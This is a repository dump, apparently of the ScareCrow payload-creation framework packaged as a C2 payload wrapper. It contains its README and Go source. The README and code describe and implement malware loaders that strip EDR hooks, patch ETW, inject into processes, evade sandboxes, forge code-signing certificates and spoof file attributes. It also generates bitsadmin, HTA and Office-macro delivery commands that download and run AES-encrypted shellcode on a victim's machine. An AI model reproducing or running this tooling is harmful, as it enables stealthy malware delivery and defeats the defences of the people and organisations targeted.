JScriptLoader_Buff(name, filename, mode, sandbox) 976 | f, _ := os.Open(filename) 977 | reader := bufio.NewReader(f) 978 | content, _ := ioutil.ReadAll(reader) 979 | encoded := base64.StdEncoding.EncodeToString(content) 980 | finalcode := JScript_Buff(fso, dropPath, encoded, code, name, mode, sandbox) 981 | URL = Utils.Command(URL, CommandLoader, outFile) 982 | if CommandLoader == "hta" { 983 | hexcode := hex.EncodeToString(content) 984 | finalcode = HTA_Buff(hexcode, filename) 985 | 986 | } 987 | if CommandLoader == "macro" { 988 | Macro_Buff(URL, outFile) 989 | } 990 | Utils.Writefile(outFile, finalcode) 991 | os.Chdir("..") 992 | os.Rename(name+"/"+outFile, outFile) 993 | os.RemoveAll(name) 994 | fmt.Println("[+] Loader Compiled") 995 | } 996 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/README.md: -------------------------------------------------------------------------------- 1 | 2 |

3 |
4 | 5 |
6 | ScareCrow 7 |

8 | 9 | 10 | 11 | ## More Information 12 | If you want to learn more about the techniques utilized in this framework please take a look at [Part 1](https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved) and [Part 2](https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught) 13 | # 14 | 15 | ## Description 16 | ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory. This works because we know the EDR’s hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process’ memory permissions to a different value, specifically from Execute–Read to Read-Write-Execute. 17 | 18 | When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in `C:\Windows\System32\`. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered. ScareCrow does not copy the entire DLL file, instead only focuses on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function’s offset. Each function has an offset which denotes the exact number of bytes from the base address where they reside, providing the function’s location on the stack. To do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges. 19 | 20 | Once these the hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid detection by non-userland, hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call to remove the hooks placed by EDRs, described above, to avoid detection by any EDR’s anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and then assembly for these custom syscall functions. 21 | 22 | ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption and initialization vector key. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DLLmain function which all DLLs typically need to operate. The DLL will still execute without any issue because the process we load into will look for those export functions and not worry about DLLMain being there. 23 | 24 | ### Binary Sample 25 |

26 | After 27 |

28 | 29 | 30 | During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things: 31 | * Code signs the Loader: 32 | Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option. 33 | * Spoof the attributes of the loader: 34 | This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned. 35 | 36 | ### File Attribute Sample 37 | 38 |

39 | 40 | With these files and the go code, ScareCrow will cross compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows for the file to be remotely pulled, accessed, and programmatically executed. 41 | 42 | 43 | ## Install 44 | The first step as always is to clone the repo. Before you compile ScareCrow, you'll need to install the dependencies. 45 | 46 | To install them, run following commands: 47 | 48 | ``` 49 | go get github.com/fatih/color 50 | go get github.com/yeka/zip 51 | go get github.com/josephspurrier/goversioninfo 52 | ``` 53 | Make sure that the following are installed on your OS: 54 | ``` 55 | openssl 56 | osslsigncode 57 | mingw-w64 58 | ``` 59 | 60 | Then build it 61 | 62 | ``` 63 | go build ScareCrow.go 64 | ``` 65 | 66 | ## Help 67 | 68 | ``` 69 | 70 | ./ScareCrow -h 71 | 72 | _________ _________ 73 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __ 74 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ / 75 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / 76 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ 77 | \/ \/ \/ \/ \/ 78 | (@Tyl0us) 79 | “Fear, you must understand is more than a mere obstacle. 80 | Fear is a TEACHER. the first one you ever had.” 81 | 82 | Usage of ./ScareCrow: 83 | -I string 84 | Path to the raw 64-bit shellcode. 85 | -Loader string 86 | Sets the type of process that will sideload the malicious payload: 87 | [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) 88 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated. 89 | [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. 90 | [*] excel - Loads into a hidden Excel process using a JScript loader. 91 | [*] msiexec - Loads into MSIexec process using a JScript loader. 92 | [*] wscript - Loads into WScript process using a JScript loader. 93 | (default "binary") 94 | -O string 95 | Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. 96 | -configfile string 97 | The path to a json based configuration file to generate custom file attributes. This will not use the default ones. 98 | -console 99 | Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. 100 | -delivery string 101 | Generates a one-liner command to download and execute the payload remotely: 102 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders). 103 | [*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders). 104 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders) 105 | -domain string 106 | The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) 107 | -etw 108 | Enables ETW patching to prevent ETW events from being generated 109 | -injection string 110 | Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path). 111 | -password string 112 | The password for the code signing cert. Required when -valid is used. 113 | -sandbox 114 | Enables sandbox evasion using IsDomainedJoined calls. 115 | -unmodified 116 | When enabled will generate a DLL loader that WILL NOT remove the EDR hooks in system DLLs and only use custom syscalls (set to false by default) 117 | -url string 118 | URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/) 119 | -valid string 120 | The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired. 121 | ``` 122 | ## Loader 123 | The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory: 124 | * Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory. 125 | * WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not injected) DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load. 126 | * Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. 127 | * Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. 128 | 129 | 130 | ScareCrow can also generate binary based payloads if needed by using the `-loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. 131 | 132 | 133 | ## Console 134 | ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional ` -ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. 135 | 136 | If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing. 137 | 138 | ## Process Injection 139 | ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write­Process­Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. 140 | 141 | This option can be used with any of the loader options. To enable process injection, use the `-injection` command-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. 142 | 143 | 144 | ## ETW Bypass 145 | ScareCrow contains the ability to patch ETW functions, preventing any event from being generated by the process. ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Use the `-etw` command-line option to enable this in your loader. 146 | 147 | 148 | ## Delivery 149 | The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: 150 | * Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. 151 | * HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders. 152 | * Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders. 153 | 154 | ## Custom Attribute Files 155 | While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name. 156 | 157 | 158 | ## To Do 159 | * Currently only supports x64 payloads 160 | * Some older versions of Window's OSes (i.e. Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability 161 | 162 | ## Credit 163 | * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo) 164 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "ScareCrow/Cryptor" 5 | "ScareCrow/Loader" 6 | "ScareCrow/limelighter" 7 | "bytes" 8 | "crypto/aes" 9 | "crypto/cipher" 10 | "encoding/base64" 11 | "encoding/hex" 12 | "flag" 13 | "fmt" 14 | "io/ioutil" 15 | "log" 16 | "os/exec" 17 | ) 18 | 19 | type FlagOptions struct { 20 | outFile string 21 | inputFile string 22 | URL string 23 | LoaderType string 24 | CommandLoader string 25 | domain string 26 | password string 27 | valid string 28 | configfile string 29 | ProcessInjection string 30 | ETW bool 31 | console bool 32 | refresher bool 33 | sandbox bool 34 | } 35 | 36 | func options() *FlagOptions { 37 | outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.") 38 | inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.") 39 | console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.") 40 | LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload: 41 | [*] binary - Generates a binary based payload. (This type does not benfit from any sideloading) 42 | [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. 43 | [*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. 44 | [*] excel - Loads into a hidden Excel process using a JScript loader. 45 | [*] msiexec - Loads into MSIexec process using a JScript loader. 46 | [*] wscript - Loads into WScript process using a JScript loader. 47 | `) 48 | refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)") 49 | URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)") 50 | CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely: 51 | [*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders). 52 | [*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders). 53 | [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)`) 54 | domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ") 55 | password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.") 56 | ETW := flag.Bool("etw", false, "Enables ETW patching to prevent ETW events from being generated") 57 | ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).") 58 | configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.") 59 | valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.") 60 | sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`) 61 | flag.Parse() 62 | return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, ETW: *ETW, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox} 63 | } 64 | 65 | func execute(opt *FlagOptions, name string) string { 66 | bin, _ := exec.LookPath("env") 67 | var compiledname string 68 | var cmd *exec.Cmd 69 | if opt.configfile != "" { 70 | oldname := name 71 | name = limelighter.FileProperties(name, opt.configfile) 72 | cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"") 73 | err := cmd.Run() 74 | if err != nil { 75 | fmt.Printf("error") 76 | } 77 | } else { 78 | name = limelighter.FileProperties(name, opt.configfile) 79 | } 80 | if opt.LoaderType == "binary" { 81 | cmd = exec.Command(bin, "GOROOT_FINAL=/dev/null", "GOOS=windows", "GOARCH=amd64", "go", "build", "-a", "-trimpath", "-ldflags", "-s -w", "-o", ""+name+".exe") 82 | } else { 83 | cmd = exec.Command(bin, "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "go", "build", "-a", "-trimpath", "-ldflags", "-w -s", "-o", ""+name+".dll", "-buildmode=c-shared") 84 | } 85 | fmt.Println("[*] Compiling Payload") 86 | var out bytes.Buffer 87 | var stderr bytes.Buffer 88 | cmd.Stdout = &out 89 | cmd.Stderr = &stderr 90 | err := cmd.Run() 91 | if err != nil { 92 | fmt.Printf("%s: %s\n", err, stderr.String()) 93 | } 94 | if opt.LoaderType == "binary" { 95 | compiledname = name + ".exe" 96 | } else { 97 | compiledname = name + ".dll" 98 | } 99 | fmt.Println("[+] Payload Compiled") 100 | limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname) 101 | return name 102 | } 103 | 104 | func main() { 105 | fmt.Println(` 106 | _________ _________ 107 | / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __ 108 | \_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ / 109 | / \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / 110 | /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ 111 | \/ \/ \/ \/ \/ 112 | (@Tyl0us) 113 | “Fear, you must understand is more than a mere obstacle. 114 | Fear is a TEACHER. the first one you ever had.” 115 | `) 116 | opt := options() 117 | 118 | if opt.inputFile == "" { 119 | log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)") 120 | } 121 | 122 | if opt.CommandLoader != "" && opt.URL == "" { 123 | log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command") 124 | } 125 | 126 | if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" { 127 | log.Fatal("Error: Invalid loader, please select one of the allowed loader types") 128 | } 129 | 130 | if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" { 131 | log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types") 132 | } 133 | 134 | if opt.CommandLoader == "hta" && opt.outFile == "" { 135 | log.Fatal("Error: Please provide the a HTA filename to store the loader in") 136 | } 137 | 138 | if (opt.CommandLoader == "hta" || opt.CommandLoader == "macro") && (opt.LoaderType == "binary" || opt.LoaderType == "dll") { 139 | log.Fatal("Error: Binary and DLL loaders are not compatable with this delivery command") 140 | } 141 | 142 | if opt.outFile != "" && (opt.LoaderType == "binary" || opt.LoaderType == "dll") { 143 | fmt.Println("[!] -O not needed. This loader type uses the name of the file they are spoofing") 144 | } 145 | 146 | if opt.LoaderType == "binary" && opt.refresher == true { 147 | log.Fatal("Error: Can not use the unmodified option with a binary loader") 148 | } 149 | 150 | if opt.console == true && opt.LoaderType != "binary" { 151 | log.Fatal("Error: Console mode is only for binary based payloads") 152 | } 153 | 154 | if opt.domain == "" { 155 | log.Fatal("Error: Please provide a domain in order to generate a code signing certificate") 156 | } 157 | 158 | if opt.password == "" && opt.valid != "" { 159 | log.Fatal("Error: Please provide a password for the valid code signing certificate") 160 | } 161 | 162 | if opt.ProcessInjection != "" && opt.ETW == true { 163 | log.Fatal("Error: Currently process injection and ETW bypass is not available together yet. Please try only one of these options") 164 | } 165 | 166 | var rawbyte []byte 167 | src, _ := ioutil.ReadFile(opt.inputFile) 168 | dst := make([]byte, hex.EncodedLen(len(src))) 169 | hex.Encode(dst, src) 170 | r := base64.StdEncoding.EncodeToString(dst) 171 | rawbyte = []byte(r) 172 | key := Cryptor.RandomBuffer(32) 173 | iv := Cryptor.RandomBuffer(16) 174 | 175 | block, err := aes.NewCipher(key) 176 | if err != nil { 177 | log.Fatal(err) 178 | } 179 | paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize) 180 | if err != nil { 181 | log.Fatal(err) 182 | } 183 | fmt.Println("[*] Encrypting Shellcode Using AES Encryption") 184 | cipherText := make([]byte, len(paddedInput)) 185 | ciphermode := cipher.NewCBCEncrypter(block, iv) 186 | ciphermode.CryptBlocks(cipherText, paddedInput) 187 | b64ciphertext := base64.StdEncoding.EncodeToString(cipherText) 188 | b64key := base64.StdEncoding.EncodeToString(key) 189 | b64iv := base64.StdEncoding.EncodeToString(iv) 190 | fmt.Println("[+] Shellcode Encrypted") 191 | name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection) 192 | name = execute(opt, name) 193 | Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox) 194 | 195 | } 196 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Utils/Utils.go: -------------------------------------------------------------------------------- 1 | package Utils 2 | 3 | import ( 4 | "ScareCrow/Cryptor" 5 | "archive/zip" 6 | "encoding/base64" 7 | "fmt" 8 | "io" 9 | "os" 10 | "path/filepath" 11 | "strings" 12 | 13 | "github.com/fatih/color" 14 | ) 15 | 16 | const base64string = "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" 17 | 18 | func Writefile(outFile string, result string) { 19 | cf, err := os.OpenFile(outFile, os.O_CREATE|os.O_WRONLY, 0644) 20 | check(err) 21 | defer cf.Close() 22 | _, err = cf.Write([]byte(result)) 23 | check(err) 24 | } 25 | 26 | func check(e error) { 27 | if e != nil { 28 | panic(e) 29 | } 30 | } 31 | 32 | func B64ripper(B64string string, B64Varible string, implant bool) string { 33 | var B64payload []string 34 | MAX_LENGTH := Cryptor.GenerateNumer(400, 850) 35 | x := 0 36 | B64length := len(B64string) 37 | if implant == true { 38 | B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+" string\n")) 39 | for x < B64length { 40 | if x+MAX_LENGTH <= B64length { 41 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+MAX_LENGTH])) 42 | 43 | x += MAX_LENGTH 44 | } else { 45 | finalLength := B64length - x 46 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+finalLength])) 47 | x += finalLength 48 | } 49 | } 50 | } else { 51 | B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+"=\"\";\n")) 52 | for x < B64length { 53 | if x+MAX_LENGTH <= B64length { 54 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+MAX_LENGTH])) 55 | 56 | x += MAX_LENGTH 57 | } else { 58 | finalLength := B64length - x 59 | B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+finalLength])) 60 | x += finalLength 61 | } 62 | } 63 | 64 | } 65 | finalstring := strings.Join(B64payload, "") 66 | return finalstring 67 | } 68 | 69 | func Unzip(src string, dest string) ([]string, error) { 70 | var filenames []string 71 | r, err := zip.OpenReader(src) 72 | if err != nil { 73 | return filenames, err 74 | } 75 | defer r.Close() 76 | for _, f := range r.File { 77 | fpath := filepath.Join(dest, f.Name) 78 | if !strings.HasPrefix(fpath, filepath.Clean(dest)+string(os.PathSeparator)) { 79 | return filenames, fmt.Errorf("%s: illegal file path", fpath) 80 | } 81 | filenames = append(filenames, fpath) 82 | if f.FileInfo().IsDir() { 